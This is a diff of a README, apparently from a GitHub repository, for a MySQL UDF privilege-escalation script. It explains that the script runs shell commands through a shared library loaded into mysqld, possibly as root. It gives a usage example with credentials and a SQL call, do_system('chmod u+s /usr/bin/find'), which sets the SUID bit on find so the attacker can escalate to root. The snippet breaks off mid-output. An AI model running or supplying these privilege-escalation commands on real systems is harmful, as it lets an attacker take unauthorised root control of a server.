zha0/MySQL-UDF-PrivEsc/README.md

 The script use UDF shared library on MySQL to execute commands, if mysqld run as root, of course the passed (<b>-c</b>)ommand will be executed as root.
 On a 64bit *nix box you can pass the compiled .so included in this repo.<br/>
 How to use the script: <b>mysql_udf_exec_sys.sh -u mysql-user -p mysql-user-password -s shared-library-path -c command-to-be-executed</b> e.g.<br/>
 <i>$ ./mysql_udf_exec_sys.sh -s lib_sys_udf.so -u root -p Secrete -c 'whoami > /tmp/whoM; chmod go+r /tmp/whoM;'</i><br>
-  Once the script has been correctly executed you can direct access MySQL console and use the function do_system directly:<br>
+  Once the script has been correctly executed you can direct access the MySQL console and use the function <b>do_system directly</b>:<br>
 <pre>mysql> use mysql;
 mysql> select do_system('chmod u+s /usr/bin/find');
 +--------------------------------------+